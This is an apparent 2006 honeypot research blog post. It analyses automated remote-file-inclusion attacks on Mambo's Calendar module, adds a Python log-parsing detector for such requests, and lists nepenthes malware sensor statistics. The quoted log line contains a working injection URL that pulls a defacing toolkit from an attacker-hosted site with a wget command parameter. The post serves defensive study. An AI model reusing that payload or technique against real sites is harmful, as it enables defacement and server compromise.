Defacing Tool 2.0 by r3v3ng4ns

Thursday, August 31. 2006
Besides the compromises of the high-interaction honeypots, we also see quite a few automated attacks. In particular, I see quite a few scanning attempts for vulnerable web applications; phpMyAdmin and Mambo are clearly dominating. The Mambo attacks look like the following:
[Sun Aug 27 14:58:59 2006] [error] [client 195.86.124.210] File does not exist:
/XXX/htdocs/components, referer: http://XXX.128.12.35/components/com_calendar.php?
absolute_path=http://www.freewebtown.com/england90/tool25.gif?&cmd=wget

This is related to a vulnerability in the Calendar module of Mambo <= 1.5.7 which allows remote file inclusion: the absolute_path parameter is used as an include path, so the request pulls in an attacker-hosted file (http://www.freewebtown.com/england90/tool25.gif). tool25.gif itself is a defacing toolkit, the same one previously mentioned by the Philippine Honeynet Project and ISC. The attackers just use a different site to host the toolkit and its configuration file (therules25.gif - http://www.freewebtown.com/england90/therules25.gif).

I uploaded the files at http://honeyblog.org/junkyard/web-based/ in a sanitized form. If you want the complete files, just write me an e-mail (thorsten [dot] holz [at] gmail [dot] com).
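The log entry above has the shape a defender can key on: a referer whose query string carries a parameter whose value is itself a remote URL, often pointing at a file with an image or text extension that actually contains PHP. The following is an added example, not code from the original post or from Mambo, that parses Apache error-log lines of that form and flags such remote-URL parameters. The log lines are constructed for the example and use placeholder hosts and documentation IPs (192.0.2.0/24), not the indicators from the post.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines modelled on the Apache error-log entry in the post.
# Hosts and client addresses are placeholders (RFC 5737 range), not real indicators.
SAMPLE_LOG = """\
[Sun Aug 27 14:58:59 2006] [error] [client 192.0.2.10] File does not exist: /var/www/htdocs/components, referer: http://honeypot.example/components/com_calendar.php?absolute_path=http://hosting.example/england90/tool25.gif?&cmd=wget
[Sun Aug 27 15:02:11 2006] [error] [client 192.0.2.11] File does not exist: /var/www/htdocs/favicon.ico, referer: http://honeypot.example/index.php?option=com_content&id=12
[Sun Aug 27 15:05:40 2006] [error] [client 192.0.2.12] File does not exist: /var/www/htdocs/admin, referer: http://honeypot.example/admin/index.php?page=ftp://hosting.example/inc/remote.php
[Sun Aug 27 15:07:03 2006] [error] [client 192.0.2.13] File does not exist: /var/www/htdocs/robots.txt
"""

# Apache 2.x error-log line: timestamp, level, client address, message, optional referer.
LOG_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[^\]]+)\] "
    r"(?P<msg>.*?)(?:, referer: (?P<referer>\S+))?$"
)

# A query value with one of these schemes is an include-path candidate.
REMOTE_SCHEMES = {"http", "https", "ftp"}
# Extensions commonly used to make a PHP payload look like a harmless static file.
DISGUISE_EXT = {".gif", ".jpg", ".jpeg", ".png", ".txt"}


def parse_line(line):
    """Split one error-log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def rfi_candidates(referer):
    """Return (param, value, disguised) for every query value that is a remote URL."""
    query = urlsplit(referer).query  # everything after the first '?', including a second '?'
    found = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        target = urlsplit(value)
        if target.scheme in REMOTE_SCHEMES and target.netloc:
            ext = target.path.rsplit(".", 1)
            disguised = len(ext) == 2 and ("." + ext[1].lower()) in DISGUISE_EXT
            found.append((name, value, disguised))
    return found


def scan(log_text):
    """Run the detector over a block of log text and return one record per hit."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or not rec["referer"]:
            continue
        params = dict(parse_qsl(urlsplit(rec["referer"]).query, keep_blank_values=True))
        for name, value, disguised in rfi_candidates(rec["referer"]):
            hits.append({
                "ip": rec["ip"],
                "param": name,
                "url": value,
                "disguised": disguised,
                # the toolkit in the post also passes a command selector; record it if present
                "cmd": params.get("cmd"),
            })
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        flag = " (payload disguised as static file)" if h["disguised"] else ""
        print(f"{h['ip']} param={h['param']} -> {h['url']}{flag} cmd={h['cmd']}")
```

The detector deliberately matches on structure (a URL inside a query value) rather than on the specific hosting site, so it keeps working when the attackers move the toolkit; the disguised flag is the signal that an "image" is being used as an include target, which is what tool25.gif is in the post.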

Nepenthes Statistics

Thursday, August 31. 2006
We still run a rather large nepenthes sensor which monitors a /18 network of continuous IP space. Here are some statistics for this sensor:

General Information

First entry in nepenthes database   2006-05-15 15:21:49
Total number of hits                4,761,665
Number of unique IPs                40,556
Number of unique malware            4,865


Top 10 Malware

Number  Malware name       Number of hits
1       W32/Parite         940
2       Worm.Padobot.M     739
3       Worm/Doomber.D     631
4       Worm/Korgo.U       509
5       Trojan.Gobot-3     422
6       Worm.Padobot.P     415
7       Worm.Padobot.N     384
8       Trojan.Gobot-4     366
9       Backdoor.Gobot.S   332
10      Worm/Padobot.P     329